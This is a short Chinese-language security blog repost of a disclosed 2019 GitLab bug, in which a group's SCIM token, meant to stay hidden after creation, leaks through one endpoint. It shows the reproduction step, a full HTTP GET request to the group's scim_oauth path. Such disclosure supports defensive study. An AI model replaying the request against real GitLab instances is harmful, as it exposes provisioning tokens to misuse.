gitlab漏洞系列-SCIM令牌泄露

admin 2022年4月25日22:59:45评论57 views字数 664阅读2分12秒阅读模式

gitlab漏洞系列-SCIM令牌泄露

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

背景

香港白帽ngalog于2019年5月提交了这个漏洞: 组的SCIM令牌应该在重置/创建后隐藏。但我发现其中一个接口可以泄露。

复现步骤

作为组(group)的管理员,在启用SCIM的情况下,发出下面的请求:


GET /groups/REPLACE_ME_GROUP_PATH/-/scim_oauth HTTP/1.1  
Host: gitlab.com  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:66.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: REPLACEME  
X-Requested-With: XMLHttpRequest  
Connection: close  
Upgrade-Insecure-Requests: 1




gitlab漏洞系列-SCIM令牌泄露



原文始发于微信公众号(迪哥讲事):gitlab漏洞系列-SCIM令牌泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月25日22:59:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   gitlab漏洞系列-SCIM令牌泄露https://cn-sec.com/archives/942499.html

发表评论

匿名网友 填写信息